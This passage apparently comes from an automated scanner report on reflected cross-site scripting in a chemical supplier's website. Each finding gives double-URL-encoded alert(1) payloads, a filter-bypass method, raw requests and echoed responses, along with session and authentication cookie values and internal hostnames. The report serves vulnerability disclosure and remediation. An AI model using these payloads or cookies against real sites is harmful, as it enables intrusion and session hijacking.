Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:45 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta0a76";alert(1)//6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.78. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2 was submitted in the REST URL parameter 2. This input was echoed as 1c772";alert(1)//055e4b14ac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c772";alert(1)//055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.79. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8 was submitted in the REST URL parameter 3. This input was echoed as 42f4a";alert(1)//cc9d2f2abe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:48 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest42f4a";alert(1)//cc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.80. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd50%2522%253balert%25281%2529%252f%252f8a5dab69c77 was submitted in the REST URL parameter 4. This input was echoed as abd50";alert(1)//8a5dab69c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50%2522%253balert%25281%2529%252f%252f8a5dab69c77/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50";alert(1)//8a5dab69c77/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.81. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51566%2522%253balert%25281%2529%252f%252facbc8230b3 was submitted in the REST URL parameter 5. This input was echoed as 51566";alert(1)//acbc8230b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566%2522%253balert%25281%2529%252f%252facbc8230b3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29002
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566";alert(1)//acbc8230b3","E404") ;
   </script>
...[SNIP]...

1.82. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e6a2%2522%253balert%25281%2529%252f%252fa640488014b was submitted in the REST URL parameter 1. This input was echoed as 1e6a2";alert(1)//a640488014b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1e6a2%2522%253balert%25281%2529%252f%252fa640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
